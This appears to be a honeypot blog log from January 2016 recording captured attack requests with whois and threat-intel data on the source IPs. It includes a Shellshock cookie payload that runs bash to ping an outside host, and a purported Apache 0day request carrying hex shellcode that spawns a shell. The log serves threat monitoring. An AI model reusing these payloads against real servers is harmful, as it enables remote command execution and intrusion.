  • Reference: https://isc.sans.edu/api/ip/85.25.217.27

Dienstag, 5. Januar 2016

46.172.71.251, 195.169.125.87 - to ping 212.47.238.143

BEGIN OF HTTP DATA:
2016-01-05 21:01:11
Source IP: 46.172.71.251 (2nd: 195.169.125.87)
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close


 END OF DATA

212.47.238[.]143

    Whois Data (TeamCymru)
  • AS : 12876
  • IP : 212.47.238.143
  • BGP Prefix : 212.47.224.0/19
  • CC : FR
  • Registry : ripencc
  • Allocated :
  • AS Name: AS12876 ONLINE S.A.S.,FR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 185.93.185.47 - shellsock ping to 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2015/10/1859318547-shellsock-ping-to-21247238143.html
  • In db since: 2015-11-05 09:22:48.499000

46.172.71[.]251

    Whois Data (TeamCymru)
  • AS : 43110
  • IP : 46.172.71.251
  • BGP Prefix : 46.172.64.0/19
  • CC : UA
  • Registry : ripencc
  • Allocated : 2010-12-06
  • AS Name: ROSTNET-AS Joint Ukrainian-American enterprise Ewropol with legal form Ltd,UA
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/46.172.71.251
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/46.172.71.251
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
    Source: Local Feed Database
  • Title: 46.172.71.251 - simple bash injection
  • Reference: http://sendmespamids.blogspot.com/2015/09/4617271251-simple-bash-injection.html
  • In db since: 2015-09-24 08:17:16.658000

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000

Montag, 4. Januar 2016

Scanner seen on January 05, 2016

  • 118.98.104[.]21 - Morfeus Fucking Scanner
  • 89.248.168[.]139 - masscan/1.0
  • 5.28.182[.]161 - masscan/1.0
  • 93.174.93[.]203 - masscan/1.0

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

89.248.168[.]139

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 89.248.168.139
  • BGP Prefix : 89.248.168.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated : 2006-07-11
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/89.248.168.139
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/89.248.168.139

5.28.182[.]161

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 5.28.182.161
  • BGP Prefix : 5.28.176.0/21
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-05-08
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/5.28.182.161
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/5.28.182.161
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

93.174.93[.]203

    Whois Data (TeamCymru)
  • AS : 29073
  • IP : 93.174.93.203
  • BGP Prefix : 93.174.88.0/21
  • CC : NL
  • Registry : ripencc
  • Allocated : 2008-06-20
  • AS Name: ECATEL-AS Quasi Networks LTD.,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/93.174.93.203
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/93.174.93.203

118.98.104.21 - Morfeus Fucking Scanner

118.98.104[.]21

    Whois Data (TeamCymru)
  • AS : 17974
  • IP : 118.98.104.21
  • BGP Prefix : 118.98.104.0/24
  • CC : ID
  • Registry : apnic
  • Allocated : 2007-08-24
  • AS Name: TELKOMNET-AS2-AP PT Telekomunikasi Indonesia,ID
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/118.98.104.21
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

77.126.12.73 - masscan/1.0

77.126.12[.]73

    Whois Data (TeamCymru)
  • AS : 9116
  • IP : 77.126.12.73
  • BGP Prefix : 77.126.0.0/20
  • CC : IL
  • Registry : ripencc
  • Allocated : 2006-11-07
  • AS Name: GOLDENLINES-ASN 012 Smile Communications Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 5.7
  • Reference: https://exchange.xforce.ibmcloud.com/ip/77.126.12.73
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/77.126.12.73

Freitag, 1. Januar 2016

185.130.5.224 - apache 0day by @hxmonsegur [Update1 - 05/01/2016]

BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/&#736%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*

31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80

 END OF DATA

185.130.5[.]224

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.224
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 1.4
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.224

UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push Twitter followers) is not reflected by any entry on exploit-db.com or 0day.today.

UPDATE 2: (Thanks to @DanielRufde)

https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0